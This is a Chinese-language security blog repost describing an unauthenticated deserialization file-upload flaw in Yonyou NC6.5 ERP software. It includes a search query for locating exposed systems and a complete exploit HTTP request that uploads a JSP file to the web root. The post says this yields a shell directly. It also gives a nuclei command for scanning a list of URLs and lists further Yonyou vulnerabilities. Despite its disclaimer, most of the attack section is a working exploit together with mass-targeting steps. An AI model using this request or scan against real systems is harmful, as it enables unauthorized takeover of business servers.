用友NC6.5反序列化文件上传漏洞

admin 2023年2月2日19:34:27评论1,203 views字数 1415阅读4分43秒阅读模式
用友NC6.5反序列化文件上传漏洞
    文章声明

安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转载私信联系。



用友NC6.5反序列化文件上传漏洞


文章简介

  用友NC产品文件上传的漏洞,恶意攻击者可以通过该漏洞上传任意文件,从而可能导致获取到目标系统管理权限。

        根据分析,漏洞为文件上传漏洞,在无需登陆系统的情况下,通过某接口直接上传文件,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大,建议及时排查。



网络测绘

app="用友-UFIDA-NC"



漏洞影响

用友NC远程代码执行漏洞影响版本:NC6.5之后版本



复现过程


利用请求包

POST /servlet/FileReceiveServlet HTTP/1.1Host: xxx.com:8090User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;Referer: https://google.comContent-Length: 149
¬ísrjava.util.HashMapÚÁÃ`ÑFloadFactorI thresholdxp?@wt FILE_NAMEt t00ls.jsptTARGET_FILE_PATHt./webapps/nc_webxsasaa

用友NC6.5反序列化文件上传漏洞

用友NC6.5反序列化文件上传漏洞

可直接getshell

nuclei-pocs

 nuclei  -t  yonyou_NC_servlet_upload_rce.yaml -l url.txt


公众号:北极星sec 回复1010获取


用友NC6.5反序列化文件上传漏洞




用友漏洞待更新记录(已更新17)

  • 用友 U8 OA test.jsp SQL注入漏洞

  • 用友nc v6.5 远程命令执行漏洞(CNVD-2021-30167)

  • 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

  • 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞

  • 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞

  • 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

  • 用友 NC NCFindWeb 任意文件读取漏洞

  • 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923

  • 用友 GRP-U8 UploadFileData 任意文件上传漏洞 

  • 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

  • 用友nc 控制台绕过漏洞

  • 用友 NC 系统 uapws wsdl XXE(2022hw) 

  • 用友时空KSOA软件前台文件上传漏洞(2022hw)

  • 用友nc v6.5 反射型xss

  • 用友nc接口信息泄露漏洞

  • 用友GRP-U8 财务管理软件servlet

  • 用友NC6.5反序列化文件上传漏洞

  • 用友 NCCloud FS文件管理SQL注入

  • 用友nc v6.5 反序列化漏洞 补丁绕过

  • 用友nc v6.5 反序列化漏洞

  • (CNVD-2021-37786)用友nc Cloud FS 文件管理系统 任意账户登录漏洞

  • 用友nc IUFO v5



用友NC6.5反序列化文件上传漏洞




用友NC6.5反序列化文件上传漏洞

用友NC6.5反序列化文件上传漏洞

用友NC6.5反序列化文件上传漏洞




原文始发于微信公众号(北极星sec):用友NC6.5反序列化文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月2日19:34:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC6.5反序列化文件上传漏洞http://cn-sec.com/archives/1341549.html

发表评论

匿名网友 填写信息